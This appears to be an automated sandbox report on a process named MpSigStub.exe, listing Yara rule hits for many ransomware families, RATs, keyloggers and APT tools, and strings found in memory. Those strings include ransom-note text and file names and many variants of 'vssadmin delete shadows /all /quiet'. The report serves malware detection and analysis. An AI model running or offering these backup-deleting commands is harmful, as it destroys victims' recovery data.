    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Sapphire RansomwareShow sources
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected OCT RansomwareShow sources
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Snatch RansomwareShow sources
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Silvertor RansomwareShow sources
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Annabelle RansomwareShow sources
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Gocoder ransomwareShow sources
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp, type: MEMORY
    Yara detected WannaRen ransomware
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Ryuk ransomware
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Porn Ransomware
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected DarkSide Ransomware
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected HiddenTear ransomware
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Mailto ransomware
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected CoronaCrypt Ransomware
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Voidcrypt Ransomware
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000023.00000003.6273117492.0000028BD7976000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected GoGoogle ransomware
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Axiom Ransomware
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Artemon Ransomware
    Source: Yara matchFile source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Covid19 Ransomware
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected LokiLocker Ransomware
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Cryptolocker ransomware
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd67c4b16.150.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Marvel Ransomware
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Cute Ransomware
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd67c4b16.150.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Xorist ransomware
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Found potential ransomware demand text
    Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: )Decrypting of your files is only possible
    Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: Decrypting of your files is only possible
    Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: )Decrypting of your files is only possible]
    Deletes shadow drive data (may be related to ransomware)
    Source: MpSigStub.exe, 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmpBinary or memory string: vssadmin Delete Shadows /all /quiet
    Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmpBinary or memory string: vssadmin.exe delete shadows /all /quiet
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpBinary or memory string: vssadmin delete shadows /all /quiet
    Source: MpSigStub.exe, 00000023.00000003.6321337544.0000028BD6471000.00000004.00000001.sdmpBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
    Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmpBinary or memory string: vssadmin delete shadows /all /for=
    Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmpBinary or memory string: cmd.exe /c vssadmin delete shadows /all /quiet
    Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmpBinary or memory string: vssadmin.exe delete shadows /all /Quiet
    Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmpBinary or memory string: /c vssadmin.exe delete shadows /quiet /all
    Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmpBinary or memory string: vssadmin delete shadows /all /quiet & wmic shadowcopy delete
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmpBinary or memory string: */C vssadmin.exe delete shadows /all /quiet
    Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmpBinary or memory string: 'vssadmin.exe delete shadows /all /quiet
    Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmpBinary or memory string: vssadmin delete shadows /all
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpBinary or memory string: /c vssadmin.exe Delete Shadows /All /Quiet
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpBinary or memory string: T/c vssadmin.exe Delete Shadows /All /Quiet
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpBinary or memory string: /c vssadmin.exe delete shadows /all /quiet
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpBinary or memory string: /C vssadmin Delete Shadows /Quiet /All
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpBinary or memory string: vssadmin delete shadows /All]
    Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmpBinary or memory string: Nvssadmin.exe delete shadows /all /quiet
    Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmpBinary or memory string: Nvssadmin.exe Delete Shadows /All /Quiet
    Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmpBinary or memory string: Fvssadmin delete shadows /all /quiet
    Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmpBinary or memory string: #vssadmin delete shadows /all /quiet
    Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet
    Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet]
    Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmpBinary or memory string: vssadmin.exe vssadmin delete shadows / all / quiet
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmpBinary or memory string: /C vssadmin.exe delete shadows /all /quiet
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmpBinary or memory string: /C vssadmin.exe delete shadows /all /quietx
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: vssadmin.exedeleteshadows/all/quiet
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: %vssadmin.exedeleteshadows/all/quiet
    Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmpBinary or memory string: vssadmindeleteshadows
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpBinary or memory string: cmd /c vssadmin delete shadows /all /quiet
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpBinary or memory string: 6vssadmin.exe delete shadows
    Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmpBinary or memory string: /C vssadmin delete shadows /all /quiet
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpBinary or memory string: vssadmin delete shadows /for=c: /all /quiet
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpBinary or memory string: vssadmin delete shadows /for=d: /all /quiet
    Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmpBinary or memory string: /c vssadmin.exe delete shadows /all /quiet]
    Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmpBinary or memory string: vssadmindeleteshadows/all/quiet
    Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmpBinary or memory string: !vssadmindeleteshadows/all/quiet
    Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmpBinary or memory string: vssadmin delete shadows
    Found string related to ransomware
    Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmpBinary or memory string: &act=gettext&lang=
    Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmpBinary or memory string: &encrypted=
    May drop file containing decryption instructions (likely related to ransomware)
    Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmpBinary or memory string: HOW TO DECRYPT FILES.txt
    Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmpBinary or memory string: HELP_instructions.html
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpBinary or memory string: How to decrypt files.html

    System Summary:

    Malicious sample detected (through community Yara rule)
    Source: 35.3.MpSigStub.exe.28bd63a2bca.206.unpack, type: UNPACKEDPEMatched rule: Detects OilRig malware Author: Eyal Sela
    Source: 35.3.MpSigStub.exe.28bd75cd186.46.raw.unpack, type: UNPACKEDPEMatched rule: Detects Derusbi Kernel Driver Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd69011fa.70.raw.unpack, type: UNPACKEDPEMatched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd6901bfe.72.raw.unpack, type: UNPACKEDPEMatched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd63a15c6.205.raw.unpack, type: UNPACKEDPEMatched rule: Detects OilRig malware Author: Eyal Sela
    Source: 35.3.MpSigStub.exe.28bd80b0d72.120.raw.unpack, type: UNPACKEDPEMatched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
    Source: 35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack, type: UNPACKEDPEMatched rule: Keylogger component Author: Microsoft
    Source: 35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack, type: UNPACKEDPEMatched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack, type: UNPACKEDPEMatched rule: Hack Deep Panda - htran-exe Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack, type: UNPACKEDPEMatched rule: Detects APT41 malware POISONPLUG Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack, type: UNPACKEDPEMatched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd780418a.59.raw.unpack, type: UNPACKEDPEMatched rule: Detects Mini RAT malware Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd72c6dd5.218.raw.unpack, type: UNPACKEDPEMatched rule: This rule looks for .NET PE files that have the strings of various method names in the TitoSpecial code. Author: FireEye
    Source: 35.3.MpSigStub.exe.28bd80e54d2.88.raw.unpack, type: UNPACKEDPEMatched rule: Detects Pupy RAT Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd80e54d2.88.raw.unpack, type: UNPACKEDPEMatched rule: Detects Pupy backdoor Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd63ac0ae.183.raw.unpack, type: UNPACKEDPEMatched rule: Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd63a2bca.206.raw.unpack, type: UNPACKEDPEMatched rule: Detects OilRig malware Author: Eyal Sela
    Source: 35.3.MpSigStub.exe.28bd780418a.26.raw.unpack, type: UNPACKEDPEMatched rule: Detects Mini RAT malware Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd6408d22.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects Molerats sample - July 2017 Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd80ae56a.119.raw.unpack, type: UNPACKEDPEMatched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
    Source: 35.3.MpSigStub.exe.28bd80ae56a.188.raw.unpack, type: UNPACKEDPEMatched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
    Source: 35.3.MpSigStub.exe.28bd69007f6.71.raw.unpack, type: UNPACKEDPEMatched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack, type: UNPACKEDPEMatched rule: Keylogger component Author: Microsoft
    Source: 35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack, type: UNPACKEDPEMatched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack, type: UNPACKEDPEMatched rule: Hack Deep Panda - htran-exe Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack, type: UNPACKEDPEMatched rule: Detects APT41 malware POISONPLUG Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack, type: UNPACKEDPEMatched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd8041112.117.raw.unpack, type: UNPACKEDPEMatched rule: Detects Mimikatz strings Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd8041112.117.raw.unpack, type: UNPACKEDPEMatched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
    Source: 35.3.MpSigStub.exe.28bd6ea607c.235.raw.unpack, type: UNPACKEDPEMatched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd64bea82.66.raw.unpack, type: UNPACKEDPEMatched rule: Detects malware from DrqgonFly APT report Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd640a126.19.raw.unpack, type: UNPACKEDPEMatched rule: Detects Molerats sample - July 2017 Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd8042916.116.raw.unpack, type: UNPACKEDPEMatched rule: Detects Mimikatz strings Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd8042916.116.raw.unpack, type: UNPACKEDPEMatched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
    Source: 35.3.MpSigStub.exe.28bd6f34515.103.raw.unpack, type: UNPACKEDPEMatched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
    Source: 35.3.MpSigStub.exe.28bd640b52a.18.raw.unpack, type: UNPACKEDPEMatched rule: Detects Molerats sample - July 2017 Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd80af96e.189.raw.unpack, type: UNPACKEDPEMatched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
    Source: 35.3.MpSigStub.exe.28bd80af96e.118.raw.unpack, type: UNPACKEDPEMatched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
    Source: 35.3.MpSigStub.exe.28bd80b0d72.190.raw.unpack, type: UNPACKEDPEMatched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
    Source: 35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack, type: UNPACKEDPEMatched rule: Keylogger component Author: Microsoft
    Source: 35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack, type: UNPACKEDPEMatched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack, type: UNPACKEDPEMatched rule: Hack Deep Panda - htran-exe Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack, type: UNPACKEDPEMatched rule: Detects APT41 malware POISONPLUG Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack, type: UNPACKEDPEMatched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd63ab4aa.184.raw.unpack, type: UNPACKEDPEMatched rule: Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd7098dc6.214.unpack, type: UNPACKEDPEMatched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
    Source: 35.3.MpSigStub.exe.28bd7098dc6.214.unpack, type: UNPACKEDPEMatched rule: Detects Mimikatz strings Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd63accb2.185.raw.unpack, type: UNPACKEDPEMatched rule: Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd6afc36e.65.unpack, type: UNPACKEDPEMatched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
    Source: 35.3.MpSigStub.exe.28bd6697177.158.unpack, type: UNPACKEDPEMatched rule: Detects Tofu Trojan Author: Cylance
    Source: 35.3.MpSigStub.exe.28bd6697177.158.unpack, type: UNPACKEDPEMatched rule: This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell Author: FireEye
    Source: 35.3.MpSigStub.exe.28bd7098dc6.98.unpack, type: UNPACKEDPEMatched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
    Source: 35.3.MpSigStub.exe.28bd7098dc6.98.unpack, type: UNPACKEDPEMatched rule: Detects Mimikatz strings Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPEMatched rule: XOR loops from Sakula malware Author: David Cannings
    Source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPEMatched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
    Source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPEMatched rule: Detects credential stealer byed on many strings that indicate password store access Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPEMatched rule: Mirage Identifying Strings Author: Seth Hardy
    Source: 35.3.MpSigStub.exe.28bd7098dc6.64.unpack, type: UNPACKEDPEMatched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
    Source: 35.3.MpSigStub.exe.28bd7098dc6.64.unpack, type: UNPACKEDPEMatched rule: Detects Mimikatz strings Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd745f702.85.unpack, type: UNPACKEDPEMatched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPEMatched rule: XOR loops from Sakula malware Author: David Cannings
    Source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPEMatched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
    Source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPEMatched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
    Source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPEMatched rule: Mirage Identifying Strings Author: Seth Hardy
    Source: 35.3.MpSigStub.exe.28bd6694af5.157.unpack, type: UNPACKEDPEMatched rule: Detects Tofu Trojan Author: Cylance
    Source: 35.3.MpSigStub.exe.28bd6694af5.157.unpack, type: UNPACKEDPEMatched rule: This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell Author: FireEye
    Source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPEMatched rule: XOR loops from Sakula malware Author: David Cannings
    Source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPEMatched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
    Source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPEMatched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
    Source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPEMatched rule: Mirage Identifying Strings Author: Seth Hardy
    Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPEMatched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
    Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPEMatched rule: XOR loops from Sakula malware Author: David Cannings
    Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPEMatched rule: APT_Backdoor_Win_GORAT_5 Author: FireEye
    Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPEMatched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
    Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPEMatched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
    Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPEMatched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
    Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPEMatched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
    Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPEMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPEMatched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
    Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPEMatched rule: APT_Backdoor_Win_GORAT_5 Author: FireEye
    Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPEMatched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
    Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPEMatched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
    Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPEMatched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
    Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPEMatched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
    Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPEMatched rule: XOR loops from Sakula malware Author: David Cannings
    Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPEMatched rule: APT_Backdoor_Win_GORAT_5 Author: FireEye
